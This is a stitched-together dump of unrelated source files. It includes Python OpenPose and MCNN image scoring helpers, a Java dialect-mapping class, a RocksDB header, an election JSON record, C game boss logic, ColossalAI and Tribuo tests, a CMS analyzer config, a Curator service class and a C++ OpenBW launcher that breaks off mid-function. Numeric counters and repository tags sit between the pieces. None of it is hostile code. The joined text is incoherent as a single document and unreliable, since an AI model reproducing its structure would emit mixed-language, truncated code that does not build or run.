# file_bytes = np.asarray(bytearray(BytesIO(filebytes).read()), dtype=np.uint8)
file_bytes = np.fromstring(filebytes, np.uint8)
img = cv2.imdecode(file_bytes, cv2.IMREAD_COLOR)
img, _ = imresizeMaxDim(img, img_dim)
return img
def load_jpg(file_bytes, img_dim):
image = np.fromstring(file_bytes, np.uint8)
image = cv2.imdecode(image, 0).astype(np.float32)
image, _ = imresizeMaxDim(image, img_dim)
ht = image.shape[0]
wd = image.shape[1]
ht_1 = int(ht / 4) * 4
wd_1 = int(wd / 4) * 4
image = cv2.resize(image, (wd_1, ht_1))
image = image.reshape((1, 1, image.shape[0], image.shape[1]))
return image
def score_openpose(e, image, w, h):
"""Score an image using OpenPose model.
Args:
e: OpenPose model.
image: Image in CV2 format.
Returns:
        Number of people in the image.
"""
resize_out_ratio = 4.0
humans = e.inference(
image, resize_to_default=(w > 0 and h > 0), upsample_size=resize_out_ratio
)
return humans
def draw_image(image, humans):
image = TfPoseEstimator.draw_humans(image, humans, imgcopy=False)
img = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
imgDebug = Image.fromarray(img)
return imgDebug
def web_encode_image(scored_image):
ret_imgio = BytesIO()
scored_image.save(ret_imgio, "PNG")
processed_file = base64.b64encode(ret_imgio.getvalue())
scored_image = urllib.parse.quote(processed_file)
return scored_image
def imresizeMaxDim(img, maxDim, boUpscale=False, interpolation=cv2.INTER_CUBIC):
"""Resize image.
Args:
img: Image in CV2 format.
maxDim: Maximum dimension.
boUpscale (optional): Defaults to False.
interpolation (optional): Defaults to cv2.INTER_CUBIC.
Returns:
Resized image and scale.
"""
scale = 1.0 * maxDim / max(img.shape[:2])
if scale < 1 or boUpscale:
img = cv2.resize(img, (0, 0), fx=scale, fy=scale, interpolation=interpolation)
else:
scale = 1.0
return img, scale
def score_mcnn(net, image):
model_output = net(image)
model_output_np = model_output.data.cpu().numpy()
estimated_count = np.sum(model_output_np)
return estimated_count, model_output
def draw_image_mcnn(model_output):
estimated_density = model_output.data.cpu().numpy()[0, 0, :, :]
estimated_density = np.uint8(estimated_density * 255 / estimated_density.max())
im = Image.fromarray(estimated_density, "L")
return im
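# Illustrative usage sketch (the checkpoint path and image file are assumptions):
#
#   router = Router(gpu_id=-1, mcnn_model_path="mcnn_shtechA_660.h5")  # gpu_id=-1 runs on CPU
#   with open("crowd.jpg", "rb") as f:
#       result = router.score(f.read(), return_image=False)
#   print(result["pred"], result["time"]["t_total"])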
| 5,072 |
567 | <gh_stars>100-1000
package parser;
/**
* Helper class that maps a feature or datatype to its appropriate dialect keyword
*/
public class DialectMap {
/* Name of the dialect */
String dialect;
/* Mapping to a feature in the dialect */
String mapping;
public String getDialect() {
return dialect;
}
public void setDialect(String dialect) {
this.dialect = dialect;
}
public String getMapping() {
return mapping;
}
public void setMapping(String mapping) {
this.mapping = mapping;
}
}
| 165 |
2,189 | <reponame>mys/steem<filename>libraries/vendor/rocksdb/db/transaction_log_impl.h
// Copyright (c) 2011-present, Facebook, Inc. All rights reserved.
// This source code is licensed under both the GPLv2 (found in the
// COPYING file in the root directory) and Apache 2.0 License
// (found in the LICENSE.Apache file in the root directory).
#pragma once
#ifndef ROCKSDB_LITE
#include <vector>
#include "db/log_reader.h"
#include "db/version_set.h"
#include "options/db_options.h"
#include "port/port.h"
#include "rocksdb/env.h"
#include "rocksdb/options.h"
#include "rocksdb/transaction_log.h"
#include "rocksdb/types.h"
#include "util/filename.h"
namespace rocksdb {
class LogFileImpl : public LogFile {
public:
LogFileImpl(uint64_t logNum, WalFileType logType, SequenceNumber startSeq,
uint64_t sizeBytes) :
logNumber_(logNum),
type_(logType),
startSequence_(startSeq),
sizeFileBytes_(sizeBytes) {
}
std::string PathName() const override {
if (type_ == kArchivedLogFile) {
return ArchivedLogFileName("", logNumber_);
}
return LogFileName("", logNumber_);
}
uint64_t LogNumber() const override { return logNumber_; }
WalFileType Type() const override { return type_; }
SequenceNumber StartSequence() const override { return startSequence_; }
uint64_t SizeFileBytes() const override { return sizeFileBytes_; }
bool operator < (const LogFile& that) const {
return LogNumber() < that.LogNumber();
}
private:
uint64_t logNumber_;
WalFileType type_;
SequenceNumber startSequence_;
uint64_t sizeFileBytes_;
};
class TransactionLogIteratorImpl : public TransactionLogIterator {
public:
TransactionLogIteratorImpl(
const std::string& dir, const ImmutableDBOptions* options,
const TransactionLogIterator::ReadOptions& read_options,
const EnvOptions& soptions, const SequenceNumber seqNum,
std::unique_ptr<VectorLogPtr> files, VersionSet const* const versions,
const bool seq_per_batch);
virtual bool Valid() override;
virtual void Next() override;
virtual Status status() override;
virtual BatchResult GetBatch() override;
private:
const std::string& dir_;
const ImmutableDBOptions* options_;
const TransactionLogIterator::ReadOptions read_options_;
const EnvOptions& soptions_;
SequenceNumber startingSequenceNumber_;
std::unique_ptr<VectorLogPtr> files_;
bool started_;
  bool isValid_;  // not valid when it starts off.
Status currentStatus_;
size_t currentFileIndex_;
std::unique_ptr<WriteBatch> currentBatch_;
std::unique_ptr<log::Reader> currentLogReader_;
Status OpenLogFile(const LogFile* logFile,
std::unique_ptr<SequentialFileReader>* file);
struct LogReporter : public log::Reader::Reporter {
Env* env;
Logger* info_log;
virtual void Corruption(size_t bytes, const Status& s) override {
ROCKS_LOG_ERROR(info_log, "dropping %" ROCKSDB_PRIszt " bytes; %s", bytes,
s.ToString().c_str());
}
virtual void Info(const char* s) { ROCKS_LOG_INFO(info_log, "%s", s); }
} reporter_;
SequenceNumber currentBatchSeq_; // sequence number at start of current batch
SequenceNumber currentLastSeq_; // last sequence in the current batch
// Used only to get latest seq. num
// TODO(icanadi) can this be just a callback?
VersionSet const* const versions_;
const bool seq_per_batch_;
// Reads from transaction log only if the writebatch record has been written
bool RestrictedRead(Slice* record, std::string* scratch);
// Seeks to startingSequenceNumber reading from startFileIndex in files_.
// If strict is set,then must get a batch starting with startingSequenceNumber
void SeekToStartSequence(uint64_t startFileIndex = 0, bool strict = false);
// Implementation of Next. SeekToStartSequence calls it internally with
// internal=true to let it find next entry even if it has to jump gaps because
// the iterator may start off from the first available entry but promises to
// be continuous after that
void NextImpl(bool internal = false);
// Check if batch is expected, else return false
bool IsBatchExpected(const WriteBatch* batch, SequenceNumber expectedSeq);
// Update current batch if a continuous batch is found, else return false
void UpdateCurrentWriteBatch(const Slice& record);
Status OpenLogReader(const LogFile* file);
};
} // namespace rocksdb
#endif // ROCKSDB_LITE
| 1,434 |
348 | {"nom":"Désertines","circ":"3ème circonscription","dpt":"Mayenne","inscrits":347,"abs":144,"votants":203,"blancs":4,"nuls":5,"exp":194,"res":[{"nuance":"UDI","nom":"M. <NAME>","voix":157},{"nuance":"REM","nom":"M. <NAME>","voix":37}]} | 94 |
5,964 | #ifndef CONTENT_RENDERER_DEVTOOLS_DEVTOOLS_MGR_H_
#define CONTENT_RENDERER_DEVTOOLS_DEVTOOLS_MGR_H_
#include "third_party/WebKit/Source/wtf/HashSet.h"
namespace content {
class DevToolsMgr {
public:
DevToolsMgr();
static DevToolsMgr* getInst();
void addLivedId(int id);
void removeLivedId(int id);
bool isLivedId(int id) const;
int getNewestId();
private:
static DevToolsMgr* m_inst;
WTF::HashSet<int> m_ids;
int m_idGen;
};
}
#endif // CONTENT_RENDERER_DEVTOOLS_DEVTOOLS_MGR_H_ | 242 |
640 | <gh_stars>100-1000
void UpdateStage5EndBoss0(enemy *en)
{
en->enemyposy--;
if(en->enemyposy<=128)
{
en->enemyparama=1;
en->enemyparamb=0;
en->enemyframe=0;
}
}
void UpdateStage5EndBoss1(enemy *en)
{
unsigned char a;
if(en->enemyframe==250)
{
en->enemyparama=2;
return;
}
// Skull movement!
DoSkullSinusMovement(en,2,0);
// Shooting
if(en->enemyframe%80==64)
{
for(a=0;a<5;a++)
{
InitEnemy(en->enemyposx+(a*8),en->enemyposy+48,STAGE5MISSILE);
enemies[numenemies-1].enemyparamb=a;
}
// Sound
PlaySound(enemybomb_psg,1);
}
}
void UpdateStage5EndBoss2(enemy *en)
{
en->enemyposy--;
if(en->enemyposy<=24)
{
en->enemyparama=3;
en->enemyparamb=0;
en->enemyframe=0;
}
}
void UpdateStage5EndBoss3(enemy *en)
{
if(en->enemyframe==250)
{
en->enemyparama=4;
return;
}
// Skull movement!
DoSkullSinusMovement(en,2,0);
// Shooting
if(en->enemyframe%16==4)
{
InitEnemyshoot(en->enemyposx,en->enemyposy+20,1);
InitEnemyshoot(en->enemyposx+32,en->enemyposy+20,1);
}
// Laser
if(en->enemyframe%32==0)
InitEnemyshootLaser(en->enemyposx+16,en->enemyposy+56);
}
void UpdateStage5EndBoss4(enemy *en)
{
en->enemyposy++;
if(en->enemyposy>=128)
{
en->enemyparama=1;
en->enemyparamb=0;
en->enemyframe=0;
}
}
unsigned char UpdateStage5EndBoss(enemy *en)
{
// Draw
DrawSpriteArray(STAGE5ENDBOSSBASE,en->enemyposx,en->enemyposy,40,56);
// Call custom function
//changeBank(FIXEDBANKSLOT);
(*(updatestage5endbossfunctions[en->enemyparama]))(en);
// Exit
return 1;
}
| 743 |
1,630 | <filename>tests/test_data/test_data_parallel_sampler.py
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import os
from functools import partial
from pathlib import Path
import pytest
import torch
import torch.distributed as dist
import torch.multiprocessing as mp
import colossalai
from torchvision import transforms, datasets
from colossalai.context import ParallelMode, Config
from colossalai.core import global_context as gpc
from colossalai.utils import get_dataloader, free_port
from colossalai.testing import rerun_if_address_is_in_use
CONFIG = Config(dict(
parallel=dict(
pipeline=dict(size=1),
tensor=dict(size=1, mode=None),
),
seed=1024,
))
def run_data_sampler(rank, world_size, port):
dist_args = dict(config=CONFIG, rank=rank, world_size=world_size, backend='gloo', port=port, host='localhost')
colossalai.launch(**dist_args)
print('finished initialization')
# build dataset
transform_pipeline = [transforms.ToTensor()]
transform_pipeline = transforms.Compose(transform_pipeline)
dataset = datasets.CIFAR10(root=Path(os.environ['DATA']), train=True, download=True, transform=transform_pipeline)
# build dataloader
dataloader = get_dataloader(dataset, batch_size=8, add_sampler=True)
data_iter = iter(dataloader)
img, label = data_iter.next()
img = img[0]
if gpc.get_local_rank(ParallelMode.DATA) != 0:
img_to_compare = img.clone()
else:
img_to_compare = img
dist.broadcast(img_to_compare, src=0, group=gpc.get_group(ParallelMode.DATA))
if gpc.get_local_rank(ParallelMode.DATA) != 0:
assert not torch.equal(
img, img_to_compare), 'Same image was distributed across ranks but expected it to be different'
torch.cuda.empty_cache()
@pytest.mark.cpu
@rerun_if_address_is_in_use()
def test_data_sampler():
world_size = 4
test_func = partial(run_data_sampler, world_size=world_size, port=free_port())
mp.spawn(test_func, nprocs=world_size)
if __name__ == '__main__':
test_data_sampler()
| 781 |
335 | /*
* Copyright 2019-2021 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.vividus.xray.factory;
import static org.junit.jupiter.api.Assertions.assertEquals;
import java.util.List;
import java.util.Set;
import java.util.function.Supplier;
import org.junit.jupiter.api.Test;
import org.mockito.Mockito;
import org.vividus.bdd.output.ManualTestStep;
import org.vividus.xray.facade.AbstractTestCaseParameters;
import org.vividus.xray.facade.CucumberTestCaseParameters;
import org.vividus.xray.facade.ManualTestCaseParameters;
import org.vividus.xray.model.AbstractTestCase;
import org.vividus.xray.model.CucumberTestCase;
import org.vividus.xray.model.ManualTestCase;
import org.vividus.xray.model.TestCaseType;
class TestCaseFactoryTests
{
private static final String PROJECT_KEY = "project-key";
private static final String ASSIGNEE = "assignee";
private final TestCaseFactory factory = new TestCaseFactory(PROJECT_KEY, ASSIGNEE);
@Test
void shouldCreateManualTestCase()
{
ManualTestStep step = Mockito.mock(ManualTestStep.class);
ManualTestCaseParameters parameters = createTestCaseParameters(TestCaseType.MANUAL,
ManualTestCaseParameters::new);
parameters.setSteps(List.of(step));
ManualTestCase testCase = factory.createManualTestCase(parameters);
assertEquals(List.of(step), testCase.getManualTestSteps());
verifyTestCase(parameters, testCase);
}
@Test
void shouldCreateCucumberTestCase()
{
CucumberTestCaseParameters parameters = createTestCaseParameters(TestCaseType.CUCUMBER,
CucumberTestCaseParameters::new);
parameters.setScenarioType("scenario-type");
parameters.setScenario("scenario");
CucumberTestCase testCase = factory.createCucumberTestCase(parameters);
assertEquals(parameters.getScenarioType(), testCase.getScenarioType());
assertEquals(parameters.getScenario(), testCase.getScenario());
verifyTestCase(parameters, testCase);
}
private void verifyTestCase(AbstractTestCaseParameters parameters, AbstractTestCase testCase)
{
assertEquals(PROJECT_KEY, testCase.getProjectKey());
assertEquals(ASSIGNEE, testCase.getAssignee());
assertEquals(parameters.getLabels(), testCase.getLabels());
assertEquals(parameters.getComponents(), testCase.getComponents());
assertEquals(parameters.getSummary(), testCase.getSummary());
}
@SuppressWarnings("unchecked")
private static <T extends AbstractTestCaseParameters> T createTestCaseParameters(TestCaseType type,
Supplier<T> factory)
{
AbstractTestCaseParameters testCase = factory.get();
testCase.setType(type);
testCase.setSummary("summary");
testCase.setLabels(Set.of("labels-1"));
testCase.setComponents(Set.of("components-1"));
return (T) testCase;
}
}
| 1,227 |
1,091 | /*
* Copyright (c) 2015-2020, Oracle and/or its affiliates. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.tribuo.data.csv;
import org.junit.jupiter.api.BeforeEach;
import org.junit.jupiter.api.Test;
import org.tribuo.data.columnar.ColumnarIterator;
import java.io.IOException;
import java.net.URI;
import java.net.URISyntaxException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertFalse;
public class CSVIteratorTest {
private URI path;
private URI noHeaderPath;
private URI quotePath;
private URI tsvPath;
private URI doubleLineBreak;
private List<ColumnarIterator.Row> pathReference;
private List<String> headers;
@BeforeEach
public void setUp() throws URISyntaxException {
path = getClass().getResource("/org/tribuo/data/csv/test.csv").toURI();
noHeaderPath = getClass().getResource("/org/tribuo/data/csv/test-noheader.csv").toURI();
quotePath = getClass().getResource("/org/tribuo/data/csv/testQuote.csv").toURI();
tsvPath = getClass().getResource("/org/tribuo/data/csv/testQuote.tsv").toURI();
doubleLineBreak = getClass().getResource("/org/tribuo/data/csv/test-double-line-break.csv").toURI();
headers = Arrays.asList("A B C D RESPONSE".split(" "));
pathReference = new ArrayList<>();
Map<String, String> rVals = new HashMap<>();
rVals.put("A", "1");
rVals.put("B", "2");
rVals.put("C", "3");
rVals.put("D", "4");
rVals.put("RESPONSE", "monkey");
pathReference.add(new ColumnarIterator.Row(0, headers, rVals));
rVals = new HashMap<>();
rVals.put("A", "2");
rVals.put("B", "5");
rVals.put("C", "3");
rVals.put("D", "4");
rVals.put("RESPONSE", "monkey");
pathReference.add(new ColumnarIterator.Row(1, headers, rVals));
rVals = new HashMap<>();
rVals.put("A", "1");
rVals.put("B", "2");
rVals.put("C", "5");
rVals.put("D", "9");
rVals.put("RESPONSE", "baboon");
pathReference.add(new ColumnarIterator.Row(2, headers, rVals));
rVals = new HashMap<>();
rVals.put("A", "3");
rVals.put("B", "5");
rVals.put("C", "8");
rVals.put("D", "4");
rVals.put("RESPONSE", "monkey");
pathReference.add(new ColumnarIterator.Row(3, headers, rVals));
rVals = new HashMap<>();
rVals.put("A", "6");
rVals.put("B", "7");
rVals.put("C", "8");
rVals.put("D", "9");
rVals.put("RESPONSE", "baboon");
pathReference.add(new ColumnarIterator.Row(4, headers, rVals));
rVals = new HashMap<>();
rVals.put("A", "0");
rVals.put("B", "7");
rVals.put("C", "8");
rVals.put("D", "9");
rVals.put("RESPONSE", "baboon");
pathReference.add(new ColumnarIterator.Row(5, headers, rVals));
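        // The reference rows above imply that test.csv presumably contains:
        //   A,B,C,D,RESPONSE
        //   1,2,3,4,monkey
        //   2,5,3,4,monkey
        //   1,2,5,9,baboon
        //   3,5,8,4,monkey
        //   6,7,8,9,baboon
        //   0,7,8,9,baboon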
}
@Test
public void testCsvReadingCorrectly() throws IOException {
CSVIterator iter = new CSVIterator(path);
for(int i=0; i < pathReference.size();i++) {
ColumnarIterator.Row iterRow = iter.next();
ColumnarIterator.Row refRow = pathReference.get(i);
assertEquals(refRow.getIndex(), iterRow.getIndex(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getFields(), iterRow.getFields(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getRowData(), iterRow.getRowData(), "Failure on row " + i + " of " + path.toString());
}
assertFalse(iter.hasNext(), "Iterator should be empty after reading");
}
@Test
public void testQuotedCsvReadingCorrectly() throws IOException {
CSVIterator iter = new CSVIterator(quotePath);
for(int i=0; i < pathReference.size();i++) {
ColumnarIterator.Row iterRow = iter.next();
ColumnarIterator.Row refRow = pathReference.get(i);
assertEquals(refRow.getIndex(), iterRow.getIndex(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getFields(), iterRow.getFields(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getRowData(), iterRow.getRowData(), "Failure on row " + i + " of " + path.toString());
}
assertFalse(iter.hasNext(), "Iterator should be empty after reading");
}
@Test
public void testNoHeaderReadingCorrectly() throws IOException {
CSVIterator iter = new CSVIterator(noHeaderPath, CSVIterator.SEPARATOR, CSVIterator.QUOTE, headers);
for(int i=0; i < pathReference.size();i++) {
ColumnarIterator.Row iterRow = iter.next();
ColumnarIterator.Row refRow = pathReference.get(i);
assertEquals(refRow.getIndex(), iterRow.getIndex(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getFields(), iterRow.getFields(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getRowData(), iterRow.getRowData(), "Failure on row " + i + " of " + path.toString());
}
assertFalse(iter.hasNext(), "Iterator should be empty after reading");
}
@Test
public void testQuotedTsvReadingCorrectly() throws IOException {
CSVIterator iter = new CSVIterator(tsvPath, '\t', '|');
for(int i=0; i < pathReference.size();i++) {
ColumnarIterator.Row iterRow = iter.next();
ColumnarIterator.Row refRow = pathReference.get(i);
assertEquals(refRow.getIndex(), iterRow.getIndex(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getFields(), iterRow.getFields(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getRowData(), iterRow.getRowData(), "Failure on row " + i + " of " + path.toString());
}
assertFalse(iter.hasNext(), "Iterator should be empty after reading");
}
@Test
public void testDoubleLineBreakReadingCorrectly() throws IOException {
CSVIterator iter = new CSVIterator(doubleLineBreak);
for(int i=0; i < pathReference.size();i++) {
ColumnarIterator.Row iterRow = iter.next();
ColumnarIterator.Row refRow = pathReference.get(i);
assertEquals(refRow.getIndex(), iterRow.getIndex(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getFields(), iterRow.getFields(), "Failure on row " + i + " of " + path.toString());
assertEquals(refRow.getRowData(), iterRow.getRowData(), "Failure on row " + i + " of " + path.toString());
}
assertFalse(iter.hasNext(), "Iterator should be empty after reading");
}
}
| 3,094 |
852 | import FWCore.ParameterSet.Config as cms
diJetAnalyzer = cms.EDAnalyzer(
'DiJetAnalyzer',
pfJetCollName = cms.string('DiJetsProd:ak4PFJetsCHS'),
pfJetCorrName = cms.string('ak4PFCHSL1FastL2L3'),
hbheRecHitName = cms.string('DiJetsProd:hbhereco'),
hfRecHitName = cms.string('DiJetsProd:hfreco'),
hoRecHitName = cms.string('DiJetsProd:horeco'),
pvCollName = cms.string('DiJetsProd:offlinePrimaryVertices'),
rootHistFilename = cms.string('dijettree.root'),
maxDeltaEta = cms.double(1.5),
minTagJetEta = cms.double(0.0),
maxTagJetEta = cms.double(5.0),
minSumJetEt = cms.double(50.),
minJetEt = cms.double(20.),
maxThirdJetEt = cms.double(75.),
debug = cms.untracked.bool(False)
)
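# Illustrative usage sketch (the process and module names are assumptions):
#   process.myDiJetAnalyzer = diJetAnalyzer.clone(minSumJetEt = 60.)
#   process.p = cms.Path(process.myDiJetAnalyzer)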
| 447 |
2,828 | <reponame>tamaashu/curator<filename>curator-x-discovery-server/src/test/java/org/apache/curator/x/discovery/server/jetty_jersey/ServiceDetails.java<gh_stars>1000+
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.curator.x.discovery.server.jetty_jersey;
import com.fasterxml.jackson.annotation.JsonRootName;
import java.util.HashMap;
import java.util.Map;
/**
* Service payload describing details of a service.
*/
@JsonRootName("details")
public class ServiceDetails {
private Map<String, String> data;
private String description;
public String getDescription() {
return description;
}
public void setDescription(String description) {
this.description = description;
}
public ServiceDetails() {
this(new HashMap<String, String>());
}
public ServiceDetails(Map<String, String> data) {
this.data = data;
}
public void setData(Map<String, String> data) {
this.data = data;
}
public Map<String, String> getData() {
return data;
}
@Override
public int hashCode() {
final int prime = 31;
int result = 1;
result = prime * result + ((data == null) ? 0 : data.hashCode());
result = prime * result
+ ((description == null) ? 0 : description.hashCode());
return result;
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (getClass() != obj.getClass())
return false;
ServiceDetails other = (ServiceDetails) obj;
if (data == null) {
if (other.data != null)
return false;
} else if (!data.equals(other.data))
return false;
if (description == null) {
if (other.description != null)
return false;
} else if (!description.equals(other.description))
return false;
return true;
}
}
| 796 |
629 | /*
* Copyright (c) 2017-present, Facebook, Inc.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*/
#include "openbwprocess.h"
#include "utils.h"
#include <common/fsutils.h>
#include <torchcraft/client.h>
#include <array>
#include <cstdlib>
#include <fcntl.h>
#include <signal.h>
#ifndef WITHOUT_POSIX
#include <poll.h>
#include <sys/socket.h>
#include <unistd.h>
#endif // WITHOUT_POSIX
#include <cereal/archives/binary.hpp>
#include <cereal/types/vector.hpp>
#include <fmt/format.h>
#include <glog/logging.h>
#include <prettyprint/prettyprint.hpp>
namespace fsutils = common::fsutils;
DEFINE_string(
bwapilauncher_directory,
"",
"Directory where to find BWAPILauncher. If empty will use PATH");
extern char** environ;
namespace cherrypi {
namespace {
int constexpr kPollTimeout = 1000;
int constexpr kMaxTimedoutPolls = 10;
auto constexpr kDtorGraceTime = std::chrono::milliseconds(500);
bool isExiting = false; // Dont start new forks if this is true
const std::unordered_map<std::string, std::string> versionMap_ = {
{"420", ""},
{"412", "-4.1.2"},
{"374", "-3.7.4"},
};
const std::unordered_map<std::string, std::string> raceMap_ = {
{"Z", "Zerg"},
{"P", "Protoss"},
{"T", "Terran"},
};
struct AIInfo {
AIInfo(std::string const& bot) {
if (bot.empty()) {
auto bwenvPath = getenv("BWENV_PATH");
if (bwenvPath != nullptr) {
aipath = bwenvPath;
} else {
#ifdef __APPLE__
std::vector tryPaths = {
"build/3rdparty/torchcraft/BWEnv/BWEnv.dylib",
"3rdparty/torchcraft/BWEnv/BWEnv.dylib",
};
#else
std::vector tryPaths = {
"build/3rdparty/torchcraft/BWEnv/BWEnv.so",
"3rdparty/torchcraft/BWEnv/BWEnv.so",
};
#endif
aipath = "";
for (auto const& p : tryPaths) {
if (fsutils::exists(p)) {
aipath = p;
}
}
if (aipath.empty()) {
throw std::runtime_error(fmt::format(
"Unable to find BWEnv library. Tried {}",
common::joinVector(tryPaths, ',')));
}
}
ainame = "BWEnv";
} else {
if (bot.find(".dll") == std::string::npos) {
throw std::runtime_error("Cannot play with non-dll bots");
}
auto basename = fsutils::basename(bot, ".dll");
auto splits = utils::stringSplit(basename, '_', 2);
if (splits.size() != 3) {
throw std::runtime_error(
"Bot name must be VERSION_RACE_NAME, like 412_T_Ironbot.dll");
}
auto versionPrefix = versionMap_.find(splits[0]);
if (versionPrefix == versionMap_.end()) {
throw std::runtime_error(
"Version must be 374, 412, or 420, not " + splits[0]);
}
bwapisuffix = versionPrefix->second;
auto race = raceMap_.find(splits[1]);
if (race == raceMap_.end()) {
throw std::runtime_error("Race must be P, T, or Z, not " + splits[1]);
}
airace = race->second;
auto aiPathPrefix =
versionPrefix->second.size() == 0 ? "" : "/starcraft/bwloader.so:";
aipath = aiPathPrefix + bot;
ainame = splits.back();
if (!fsutils::exists("msvcrt.dll")) {
throw std::runtime_error(
"You don't have the DLLs for running bots available! ");
}
}
}
std::string aipath;
std::string ainame;
std::string bwapisuffix;
std::string airace;
};
std::string generateBwapiCommand(AIInfo const& aiinfo) {
auto bwapicmd = "BWAPILauncher" + aiinfo.bwapisuffix;
if (!FLAGS_bwapilauncher_directory.empty()) {
bwapicmd = FLAGS_bwapilauncher_directory + "/" + bwapicmd;
if (!fsutils::exists(bwapicmd)) {
auto fallback = fsutils::which("BWAPILauncher" + aiinfo.bwapisuffix);
LOG(WARNING) << "No such file " << bwapicmd << ". Falling back to "
<< fallback;
bwapicmd = std::move(fallback);
}
}
if (fsutils::which(bwapicmd).empty()) {
throw std::runtime_error(fmt::format(
"No such executable: {}. Please add BWAPILauncher to the PATH, or "
"specify its directory with -bwapilauncher_directory",
bwapicmd));
}
return bwapicmd;
}
} // namespace
OpenBwProcess::OpenBwProcess(std::vector<cherrypi::EnvVar> const& vars)
: OpenBwProcess("", vars) {}
OpenBwProcess::OpenBwProcess(
std::string bot,
std::vector<cherrypi::EnvVar> const& vars) {
#ifdef WITHOUT_POSIX
throw std::runtime_error("OpenBwProcess: Not implemented");
#else // WITHOUT_POSIX
if (isExiting) {
throw std::runtime_error("OpenBwProcess: exit in progress");
}
AIInfo aiinfo(bot);
std::string bwapicmd = generateBwapiCommand(aiinfo);
socketPath_ = fsutils::mktemp("cherrypi-openbwprocess.socket");
// Set a couple of default variables
std::vector<cherrypi::EnvVar> env = {
{"OPENBW_ENABLE_UI", "0", false},
{"TORCHCRAFT_FILE_SOCKET", socketPath_.c_str(), true},
{"BWAPI_CONFIG_AUTO_MENU__CHARACTER_NAME", aiinfo.ainame.c_str(), true},
{"BWAPI_CONFIG_AUTO_MENU__AUTO_MENU", "SINGLE_PLAYER", true},
{"BWAPI_CONFIG_AUTO_MENU__GAME_TYPE", "USE_MAP_SETTINGS", true},
{"BWAPI_CONFIG_AUTO_MENU__AUTO_RESTART", "OFF", true},
};
// Users shouldn't be able to change these...
std::vector<cherrypi::EnvVar> postEnv = {
{"BWAPI_CONFIG_AI__AI", aiinfo.aipath.c_str(), true},
};
if (aiinfo.airace.size() != 0) {
postEnv.push_back(
{"BWAPI_CONFIG_AUTO_MENU__RACE", aiinfo.airace.c_str(), true});
}
env.insert(env.end(), vars.begin(), vars.end());
env.insert(env.end(), postEnv.begin(), postEnv.end());
fork_ = ForkServer::instance().execute({bwapicmd}, env);
if (bot == "") {
running_.store(true);
goodf_ = goodp_.get_future();
outputThread_ =
std::async(std::launch::async, &OpenBwProcess::redirectOutput, this);
}
#endif // WITHOUT_POSIX
}
OpenBwProcess::~OpenBwProcess() {
#ifndef WITHOUT_POSIX
running_.store(false);
// This write should wake up the redirection thread if it's polling
if (write(fork_.wfd, "\0", 1) < 0) {
// We don't really care
}
// Give the process a bit of time to exit by itself so it can e.g. write
// replays at the end of the game.
auto waitUntil = hires_clock::now() + kDtorGraceTime;
do {
if (kill(fork_.pid, 0) != 0 && errno == ESRCH) {
break;
}
std::this_thread::sleep_for(std::chrono::milliseconds(20));
} while (hires_clock::now() < waitUntil);
if (outputThread_.valid()) {
outputThread_.wait();
}
if (socketPath_.size() > 0) {
fsutils::rmrf(socketPath_);
int err = errno;
if (fsutils::exists(socketPath_)) {
VLOG(0) << "Unable to remove " << socketPath_ << " "
<< google::StrError(err);
} else {
VLOG(2) << socketPath_ << " successfully deleted";
}
}
#endif // !WITHOUT_POSIX
}
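// Waits (up to timeoutMs, or indefinitely if negative) for the launcher to report its
// socket, then connects the TorchCraft client to it.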
bool OpenBwProcess::connect(torchcraft::Client* client, int timeoutMs) {
if (goodf_.valid()) {
VLOG(2) << "Trying to connect to " << socketPath_;
auto good = [&]() {
// Make sure we call get() on the future so that exceptions are properly
// propagated
if (timeoutMs < 0) {
goodf_.get();
return true;
} else {
if (goodf_.wait_for(std::chrono::milliseconds(timeoutMs)) !=
std::future_status::ready) {
return false;
}
goodf_.get();
return true;
}
}();
if (good) {
VLOG(2) << "Connected to " << socketPath_;
return client->connect(socketPath_, timeoutMs);
}
}
return false;
}
/// Reads the BWEnv port and logs all BWAPILauncher output (-v 2)
void OpenBwProcess::redirectOutput() {
#ifndef WITHOUT_POSIX
common::setCurrentThreadName("redirectOutput");
std::array<char, 256> buf;
std::vector<char> linebuf(buf.size());
size_t lpos = 0;
bool readSocket = false;
// Make pipe to BWAPILauncher process non-blocking; use poll() instead.
int flags = fcntl(fork_.fd, F_GETFL, 0);
flags |= O_NONBLOCK;
